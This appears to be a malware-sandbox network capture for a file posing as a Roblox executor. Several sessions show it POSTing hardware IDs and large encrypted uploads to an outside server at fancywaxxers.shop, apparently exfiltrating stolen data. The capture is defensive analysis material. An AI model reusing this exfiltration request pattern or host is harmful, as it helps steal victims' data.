{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e4fObAdqMBFeQCEXu16kFfUlEfjjF7GvIQkqNQY%2BY%2B%2B6bmBzPAw%2FMITfO8IZSKlrIRENezfbPPDf5V%2FHlL3Ef1%2FyW4vFEVl6lqWNNQ94wVv3AriCRRmdkwJhrliUsjxOygzhvA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fab9ccdb81cc32e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1640&min_rtt=1607&rtt_var=626&sent=8&recv=18&lost=0&retrans=0&sent_bytes=2843&recv_bytes=13745&delivery_rate=1817050&cwnd=178&unsent_bytes=0&cid=f3f61ae95ac9fded&ts=509&x=0"
2024-12-31 16:23:10 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-31 16:23:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49707	104.21.96.1	443	2828	C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 16:23:10 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=DAKKXE4EIJND8HPYCXY User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15087 Host: fancywaxxers.shop
2024-12-31 16:23:10 UTC	15087	OUT	Data Raw: 2d 2d 44 41 4b 4b 58 45 34 45 49 4a 4e 44 38 48 50 59 43 58 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 30 41 43 37 33 32 39 30 38 37 41 39 32 44 32 45 45 39 30 36 35 46 32 44 36 31 32 45 42 30 43 0d 0a 2d 2d 44 41 4b 4b 58 45 34 45 49 4a 4e 44 38 48 50 59 43 58 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 44 41 4b 4b 58 45 34 45 49 4a 4e 44 38 48 50 59 43 58 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 38 39 Data Ascii: --DAKKXE4EIJND8HPYCXYContent-Disposition: form-data; name="hwid"C0AC7329087A92D2EE9065F2D612EB0C--DAKKXE4EIJND8HPYCXYContent-Disposition: form-data; name="pid"2--DAKKXE4EIJND8HPYCXYContent-Disposition: form-data; name="lid"yau6Na--89
2024-12-31 16:23:11 UTC	1137	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 16:23:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=p39u4d34idkhtip6vop6iimcmb; expires=Sat, 26 Apr 2025 10:09:50 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3q6R6I6WQ2wdyXrKK0vXO7qBHSwcgxPbQm%2BaAXAWUvLSoIaU1s5%2Ba8NLW4tok0Uh2Q28E8O8QtIBXbBI9jSN4%2FwUT%2FeOPdX%2FxXt2jMOmVTlofYG3vwG4cd5lT5HmEErQrZI3YQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fab9cd4e96f42c0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1706&min_rtt=1700&rtt_var=650&sent=12&recv=19&lost=0&retrans=0&sent_bytes=2843&recv_bytes=16029&delivery_rate=1665715&cwnd=212&unsent_bytes=0&cid=f8900222d71f680a&ts=900&x=0"
2024-12-31 16:23:11 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-31 16:23:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49708	104.21.96.1	443	2828	C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 16:23:12 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=DVE80MC68OH49RH1N7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20571 Host: fancywaxxers.shop
2024-12-31 16:23:12 UTC	15331	OUT	Data Raw: 2d 2d 44 56 45 38 30 4d 43 36 38 4f 48 34 39 52 48 31 4e 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 30 41 43 37 33 32 39 30 38 37 41 39 32 44 32 45 45 39 30 36 35 46 32 44 36 31 32 45 42 30 43 0d 0a 2d 2d 44 56 45 38 30 4d 43 36 38 4f 48 34 39 52 48 31 4e 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 44 56 45 38 30 4d 43 36 38 4f 48 34 39 52 48 31 4e 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 38 39 39 30 38 Data Ascii: --DVE80MC68OH49RH1N7Content-Disposition: form-data; name="hwid"C0AC7329087A92D2EE9065F2D612EB0C--DVE80MC68OH49RH1N7Content-Disposition: form-data; name="pid"3--DVE80MC68OH49RH1N7Content-Disposition: form-data; name="lid"yau6Na--89908
2024-12-31 16:23:12 UTC	5240	OUT	Data Raw: 3e 93 af 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: >56vMMZh'F3Wun 4F([:7s~X`nO
2024-12-31 16:23:12 UTC	1137	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 16:23:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=0hnefop3qvjc6ih4aprrti0n3m; expires=Sat, 26 Apr 2025 10:09:51 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1Gr3zqAL%2FRBxCgCtXzb8Jrm2HwFemdcQqoIF0t1u4JZRCigBMJTj0dKSwXl27SeBYsbLuG%2B4k%2FUiBVUdYRFYx%2FQZ5p6H0hhqqZu1G4szGenzM2jEp61y2y%2BducUPW8KK7bPAcg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fab9cde1add72a4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1915&min_rtt=1908&rtt_var=730&sent=12&recv=26&lost=0&retrans=0&sent_bytes=2843&recv_bytes=21534&delivery_rate=1485249&cwnd=212&unsent_bytes=0&cid=0b8c452a4318e2dd&ts=619&x=0"
2024-12-31 16:23:12 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-31 16:23:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49709	104.21.96.1	443	2828	C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 16:23:13 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=OXAT6TVT3CL1XK User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1236 Host: fancywaxxers.shop
2024-12-31 16:23:13 UTC	1236	OUT	Data Raw: 2d 2d 4f 58 41 54 36 54 56 54 33 43 4c 31 58 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 30 41 43 37 33 32 39 30 38 37 41 39 32 44 32 45 45 39 30 36 35 46 32 44 36 31 32 45 42 30 43 0d 0a 2d 2d 4f 58 41 54 36 54 56 54 33 43 4c 31 58 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4f 58 41 54 36 54 56 54 33 43 4c 31 58 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 38 39 39 30 38 33 34 34 30 0d 0a 2d 2d 4f 58 41 54 Data Ascii: --OXAT6TVT3CL1XKContent-Disposition: form-data; name="hwid"C0AC7329087A92D2EE9065F2D612EB0C--OXAT6TVT3CL1XKContent-Disposition: form-data; name="pid"1--OXAT6TVT3CL1XKContent-Disposition: form-data; name="lid"yau6Na--899083440--OXAT
2024-12-31 16:23:14 UTC	1134	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 16:23:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=5rdfnvr8tp7vre3bobu5pssfng; expires=Sat, 26 Apr 2025 10:09:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f%2BJR%2BBTSHgyN02EWfWbB%2F%2BH9vC5erMT2Bxr8TGcnGE%2BTGPpFlR0djLFlNuPo5GUepwWwXFpclFTTgScxaPaKwsUPC2lkcZacFfgH2Oum4qx3AoP8dskkN22gL7l4bzyw3kMcwA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fab9ce8ae26c32e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1676&min_rtt=1662&rtt_var=652&sent=7&recv=9&lost=0&retrans=0&sent_bytes=2842&recv_bytes=2150&delivery_rate=1641371&cwnd=178&unsent_bytes=0&cid=6b66b407c573c206&ts=575&x=0"
2024-12-31 16:23:14 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-31 16:23:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49710	104.21.96.1	443	2828	C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 16:23:15 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=G9COZEGBVXJQXX User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 567879 Host: fancywaxxers.shop
2024-12-31 16:23:15 UTC	15331	OUT	Data Raw: 2d 2d 47 39 43 4f 5a 45 47 42 56 58 4a 51 58 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 30 41 43 37 33 32 39 30 38 37 41 39 32 44 32 45 45 39 30 36 35 46 32 44 36 31 32 45 42 30 43 0d 0a 2d 2d 47 39 43 4f 5a 45 47 42 56 58 4a 51 58 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 47 39 43 4f 5a 45 47 42 56 58 4a 51 58 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 38 39 39 30 38 33 34 34 30 0d 0a 2d 2d 47 39 43 4f Data Ascii: --G9COZEGBVXJQXXContent-Disposition: form-data; name="hwid"C0AC7329087A92D2EE9065F2D612EB0C--G9COZEGBVXJQXXContent-Disposition: form-data; name="pid"1--G9COZEGBVXJQXXContent-Disposition: form-data; name="lid"yau6Na--899083440--G9CO
2024-12-31 16:23:15 UTC	15331	OUT	Data Raw: ea 91 ec 8e db 72 92 30 1f ef cf ce 97 43 ad 2a ae 1f 35 fe 93 2b d1 68 5a e0 86 6d a0 d7 3b 69 90 34 9f dc 48 94 a1 26 49 fd ae 15 64 d1 20 cc b3 b5 dc 68 e8 6d 9f fa 98 80 cb b9 55 c8 3b ad 01 5e 1a 11 d6 e5 08 dd d3 7d 4c 71 5a 30 4b 75 c3 4c 69 f7 c2 93 b8 ce 92 1c 2c ac b7 64 91 5b b4 33 e1 e5 76 3a 6f 72 86 52 25 3b 5d a2 b8 7a 8f 15 9e 35 c7 0a 54 09 d9 35 53 be 1d a6 c2 c6 fc 40 6d c2 b1 d3 6a 1c 9a 3a c1 bc 85 5b 14 03 df 8a f0 2c f6 1d 21 ff 83 b1 6b b7 f4 11 1d d6 10 1e 92 a8 9e b8 d5 18 d0 8e db 7c 47 9c 7b 1f a7 89 8f 46 6d 15 0a 26 9c 62 62 c8 ce 1f 9e 25 5a 1c d7 bd b2 04 39 b6 5b d4 a4 06 d7 2c db f2 a3 38 19 a3 a4 bc d8 f9 3b 23 0a cd 77 59 66 13 8d 9b ba 16 ef d7 d4 33 aa 43 fd 92 20 73 3c 59 3e 38 14 9e 42 1d fd a7 29 8d a7 8a a2 96 80 Data Ascii: r0C*5+hZm;i4H&Id hmU;^}LqZ0KuLi,d[3v:orR%;]z5T5S@mj:[,!k\|G{Fm&bb%Z9[,8;#wYf3C s<Y>8B)
2024-12-31 16:23:15 UTC	15331	OUT	Data Raw: b5 82 1d 98 17 ce 96 cd 14 22 55 23 92 7b 6b 5a dd 89 93 cf 3a d2 6c 2c b5 70 7e 5c f1 b8 21 81 b0 fb 4e 35 39 96 b4 94 dc 1f e9 7d ff 07 23 4a 96 3f 21 12 32 50 43 29 e5 29 b7 3b fe d7 6d 72 34 cc 33 df 2f 34 dc c7 0e 4a 47 19 05 aa 07 9b 35 04 15 11 30 6c b1 ae c7 5f 56 94 13 22 6b 8c 10 5e e5 44 b8 55 6f 95 fe 3c 9a f3 a4 54 18 da 24 f0 76 b9 da 25 f2 11 86 15 6c 18 a1 01 51 eb 6f 9a ef 88 06 16 ab ae 36 07 d0 d1 bb 86 ca 54 e4 8a b6 e2 77 2a 86 c2 5e 63 8a 03 c1 d6 6f 03 a7 15 ac d6 5f 31 2c 7e 6d c4 da ec 46 ed 50 3d bb bd 91 e7 3f ea ec 9a 9b 18 5f 1a 79 67 fd 71 f9 fa 58 e2 c0 c9 43 03 3f 03 d7 df 32 3c d9 5f 9e fd 96 50 b7 1d 3c 00 2a 16 56 ed 4b 54 ae db 8c b6 a6 06 3e d4 ff f5 df 59 d4 da e6 a0 b4 64 d9 1d bb 9f ff cc 6b 2b fc 6d cb 76 3b dd 1d Data Ascii: "U#{kZ:l,p~\!N59}#J?!2PC));mr43/4JG50l_V"k^DUo<T$v%lQo6Tw^co_1,~mFP=?_ygqXC?2<_P<VKT>Ydk+mv;
2024-12-31 16:23:15 UTC	15331	OUT	Data Raw: 4f d9 2f 8e 5d e8 95 8a 7e da d8 7d 1c ac f0 4d 94 b5 37 11 24 1e 01 d3 5a 18 69 15 90 32 35 b0 4a a2 ea ef 1c b4 59 24 8c 49 df b8 d1 41 d3 c2 24 ba 81 5e 02 11 03 2e 1f 57 fb 7e 08 93 af 75 5a 83 68 01 74 ce e2 7b 0f 00 e5 48 f8 75 03 c3 52 3e b3 92 7b 46 99 61 f6 81 84 88 16 6d 37 28 41 0b e4 bb 73 54 20 38 9e 40 b9 c4 3c 05 51 15 2e ac 67 23 33 66 f9 13 c1 44 19 74 f9 63 43 d5 e7 dd e4 a9 10 db d9 9b 47 90 ca c3 29 21 46 f9 b2 c1 16 f2 cf b7 26 a6 22 af 07 8a ad 0c 4a f8 eb cf 50 cb 9d 08 90 ca fc 3d 88 02 0c 19 75 77 b6 c8 a9 fa a8 37 05 7b 49 dd 7b 2d d4 72 34 b6 a7 e3 c8 f1 ac dc 2d 81 b7 5e c6 ad 5b f7 b8 0f 51 80 b1 28 dd 2a 0e d3 1f 04 fb 41 4d 03 61 84 45 c0 56 5b 13 18 53 e6 1d be af 01 b8 39 67 45 51 96 3f 7c 83 68 bf 04 bb 1f e8 b2 3f 91 48 Data Ascii: O/]~}M7$Zi25JY$IA$^.W~uZht{HuR>{Fam7(AsT 8@<Q.g#3fDtcCG)!F&"JP=uw7{I{-r4-^[Q(*AMaEV[S9gEQ?\|h?H
2024-12-31 16:23:15 UTC	15331	OUT	Data Raw: 4d 27 6c 48 d4 2d 02 a4 2b 67 25 9f e1 cf 9e 58 73 ad 8f 16 37 d5 48 eb 69 16 22 36 05 98 7a 56 65 ed 16 88 f6 9e 6c ea 34 73 e4 d9 34 a1 b4 eb ad 2b 83 56 e1 90 f7 63 e3 98 12 52 52 a6 ba 00 10 62 5d 10 23 b9 6d 0f 1b 16 bc 59 b1 71 08 8f da 19 87 bb 40 ee 3b 20 0e e1 23 7a 1a c8 c1 53 6b 3d 12 11 9e f1 ef 5f e9 17 35 85 1e 10 ce 1a e7 4f f5 d1 2f 88 f9 b6 11 8e fb 76 f8 7e e8 cc 07 35 51 de 43 e2 ff ef b4 6b b0 09 a8 a1 18 10 a3 87 4a 85 c2 33 8e 83 cc 88 fa 8f 00 ae bf 00 ab b3 a4 ea 7e 4f 9c 3f 10 cb 30 32 72 29 9c 0a 82 e3 36 1d 53 a3 c3 47 32 36 5f 58 3f e2 e9 30 a3 7f 5f 11 43 c1 dd c3 d9 20 c9 8b ac 87 5a a9 36 83 4d d5 88 ee a9 6b b8 fd 99 01 d8 f4 77 46 7d 62 e5 62 a8 90 20 2c 09 be 59 ea db e3 ea ca 39 00 4a 3a 12 19 ed 4d b7 b7 ab 9a 36 cc 83 Data Ascii: M'lH-+g%Xs7Hi"6zVel4s4+VcRRb]#mYq@; #zSk=_5O/v~5QCkJ3~O?02r)6SG26_X?0_C Z6MkwF}bb ,Y9J:M6
2024-12-31 16:23:15 UTC	15331	OUT	Data Raw: 69 1a 08 0b 55 21 81 05 fb cc ee 7e ed 96 c1 df 9d 19 1b e6 da 65 fb 3b 4d 6a f5 fb f3 c3 76 dc a1 1d ac 7f 5e ca 14 09 54 20 d1 7c 0f 07 38 b1 d5 bf b1 4c 5f 6a 33 57 73 94 cf 6e 8a 14 a1 1a 89 87 a8 c2 af 88 bd 7c b9 79 86 b5 a4 5a fd 8b f8 17 b3 d5 15 41 9a c6 2f e2 b1 69 0a 77 e0 0c 19 98 8f 33 9f fc 0d 38 24 4e 8f 18 55 fd c0 c6 8c f5 4e ec 97 c7 d4 57 36 f8 16 32 84 4e 57 1d 74 d8 64 ec 0b 6c 09 a0 1c 8b 7c 9f 2a 1e 55 5f 8d 96 8d 22 15 7c 71 b4 db 53 2b fd de ec 5e f0 93 41 54 d3 f3 f5 9a 95 b6 5c 61 cf f9 3c 43 d8 70 cf ef d9 c2 da d4 27 d4 ee 0f 84 a9 6f 85 22 ce 80 3c bd 4d 1b d1 b7 fd a0 1f ba b6 fa 43 54 61 a8 78 4f 7d e5 26 67 f3 50 21 d6 54 88 2c 2c e8 7b cf 74 3e 0c 26 9b 85 9d 97 1d f9 7e 18 23 27 45 fc 55 5c 88 3a 72 21 b7 80 90 5e b0 fa Data Ascii: iU!~e;Mjv^T \|8L_j3Wsn\|yZA/iw38$NUNW62NWtdl\|*U_"\|qS+^AT\a<Cp'o"<MCTaxO}&gP!T,,{t>&~#'EU\:r!^
2024-12-31 16:23:15 UTC	15331	OUT	Data Raw: 51 b9 79 95 c8 77 2c e0 75 94 ca 7f 02 35 bd a7 0f 3a 94 07 97 5b 6f 3d 51 b0 98 d5 8d f2 8b 7b 1e a8 73 c4 fa c8 25 f7 ae 1f 25 67 ff a0 6a 9e 07 ec d8 38 13 3f 29 26 ed c1 a6 3c c7 85 9f cf 0f 7e 3b c0 2a b3 d1 ed e8 eb 7c 78 7d 30 a4 6e bc 38 b5 63 3f 39 d7 99 7b dd f2 ba 43 d7 d9 7c cd 82 b4 36 66 ef cf fc 73 1d 9d b1 b2 83 7b 2f 2c f5 2d ac bc 55 77 cc a1 fe d9 1f 76 5e cb 1c 44 3c 3e 07 f1 49 42 b5 15 be df bd 76 7c f0 64 9c 4f 77 de c3 97 9c d5 d0 95 3a 75 62 25 df 68 ff df f4 c1 44 da c0 c3 49 e7 db 35 39 7f 85 2d 74 45 75 35 48 5d 0a 5b 58 2f b9 81 42 85 b4 8e a5 e5 e4 36 8c a5 ae bc a5 ad da 58 b8 2e 18 fe 8c 4d cb 68 b8 d2 12 74 84 24 56 57 f3 95 fa 27 ca ed ed c2 44 56 fb 66 d6 8f ad ac ad c7 53 57 6c 8a 04 6c ce 18 de a1 29 4b d4 98 90 19 09 Data Ascii: Qyw,u5:[o=Q{s%%gj8?)&<~;*\|x}0n8c?9{C\|6fs{/,-Uwv^D<>IBv\|dOw:ub%hDI59-tEu5H][X/B6X.Mht$VW'DVfSWll)K
2024-12-31 16:23:15 UTC	15331	OUT	Data Raw: f7 51 f0 72 3e 95 4a 9a 0c c0 3f 91 87 db e7 3c 45 9b 03 cf 0c af c6 30 8e e1 5b 16 44 0d f8 d7 bf f7 20 77 83 99 05 e5 16 ba 20 26 25 a9 de 60 51 3b 1e d6 c4 78 4e 49 e7 b0 df 31 95 51 e6 58 e6 76 6c 67 b7 b6 1b 0c 47 84 3f d1 6d 37 e2 4b 70 3f ed f4 a6 f3 d5 c0 0e 84 6b 3f 42 db b3 5d 9b b3 db 44 1e 91 a6 bf 9e 15 95 db 88 c3 a3 04 57 f0 c0 cf 1c cf f6 39 e0 3c 54 3e cf 21 8f bc 2f 65 13 20 07 12 fb 6e 34 75 b9 34 60 17 cd e1 5e 42 e5 2f 89 f7 62 33 2f da 2d eb cf 10 64 2e 06 20 93 eb 16 c6 21 51 32 ef 2c 8b 3b 05 dd d8 78 36 92 4c a4 c8 6d 38 96 e4 cd 7b 08 f1 4f 24 d5 ed c7 e7 cf 7b b6 89 ca 2b 81 84 d5 d9 fe 66 dd b4 a6 9e 4b 40 4f c9 4c 27 fd 82 fe eb 7d fa 9a ad af 16 69 ca 95 e8 8f 47 5e 94 e0 80 4c 46 44 9d 14 3e 16 33 57 28 6c 8b 19 0f 3e bc 38 Data Ascii: Qr>J?<E0[D w &%`Q;xNI1QXvlgG?m7Kp?k?B]DW9<T>!/e n4u4`^B/b3/-d. !Q2,;x6Lm8{O${+fK@OL'}iG^LFD>3W(l>8
2024-12-31 16:23:15 UTC	15331	OUT	Data Raw: 24 8c 31 8a 01 62 d1 26 05 4e 1a 24 04 5a c1 ca 30 eb 1e 6f 4c c6 6c fd b6 c5 77 7d 83 8d ab ed 36 e3 a9 e2 39 9c d6 87 8a ff f6 85 cf 6a 97 f1 c4 79 6a 73 31 72 29 d3 2c 4c 6c c6 80 4d 0e dd 33 67 26 b7 1f 4d 22 6d a4 2d 21 bf a1 45 7e 19 56 86 64 9f c9 84 e1 34 ac cc 28 34 ba d7 0c b1 56 93 da 42 e6 12 cb 8f ff 89 0e 23 60 85 e2 94 42 a1 84 0a 81 66 bd 21 93 8a 0f 32 da 56 f6 b8 6e 9b 2e c5 61 c5 6c 68 45 13 ec 30 e9 28 c0 c6 ec bb a8 59 ca 0b 08 22 67 46 05 dd 25 8f b0 5e 30 ac 38 d9 46 9b 12 5b ab 37 67 28 26 5b c0 dc c0 d8 bf 0e a7 02 1e 7d 11 65 88 22 54 d4 82 74 0b da 46 40 71 f7 7d 3b dc d2 7c 10 45 45 e8 03 b6 63 4f 09 f6 5a c6 6c 7c 0f 93 94 ad 2c 75 9d a6 b0 c8 7f f9 20 a5 b0 03 6d af 8d 05 f3 85 a5 7c 3c 94 cb d0 4b 06 db c6 d5 e6 46 1c bb be Data Ascii: $1b&N$Z0oLlw}69jyjs1r),LlM3g&M"m-!E~Vd4(4VB#`Bf!2Vn.alhE0(Y"gF%^08F[7g(&[}e"TtF@q};\|EEcOZl\|,u m\|<KF
2024-12-31 16:23:15 UTC	15331	OUT	Data Raw: 98 62 32 91 ea 0d a0 41 63 2a 5b 8d 88 c0 eb ef c4 9d 2d 42 6e 7e f4 6f a6 ee e1 03 ca 7f 67 7d 73 78 b9 f9 43 34 72 6a 34 0e fb f1 00 db e3 11 ca c8 af f8 fc ee a8 3d 6a ba 70 b9 7d 49 ff 31 57 92 5a 60 4a 08 72 8e 24 e5 a0 1b be e5 20 43 d1 07 88 70 1b c9 c2 25 f1 b4 0f 20 a2 6f 8e 50 06 d3 c1 60 5b 15 10 37 38 40 a1 41 49 4a 2b 6b 3f f8 ab 4f 7d ad bd 85 de 54 a0 52 2f 01 b5 13 11 ab fe 23 d8 dd 75 2c d6 da 0f 5c 01 68 14 de 15 c0 91 ee 48 ed 71 d0 79 18 7b 22 b8 4b 5c ec 4d d5 b6 12 3b 36 e8 22 0a ff 22 46 07 08 22 11 36 6a 59 40 ed 08 af b3 6a f4 dd 18 d6 63 c9 4d 9b c8 b0 92 7d 22 d9 7c 35 1f 01 ef c8 51 fd 37 67 39 0f e3 e1 5b 7b 8d 74 b8 de 34 78 1d 90 7e 6d 64 98 8c 60 d7 e7 f4 cc f9 3e 74 7e f2 1e b3 4c 1c c0 f5 07 8f 70 fe ef 60 d1 2b e8 26 9c Data Ascii: b2Ac*[-Bn~og}sxC4rj4=jp}I1WZ`Jr$ Cp% oP`[78@AIJ+k?O}TR/#u,\hHqy{"K\M;6""F"6jY@jcM}"\|5Q7g9[{t4x~md`>t~Lp`+&
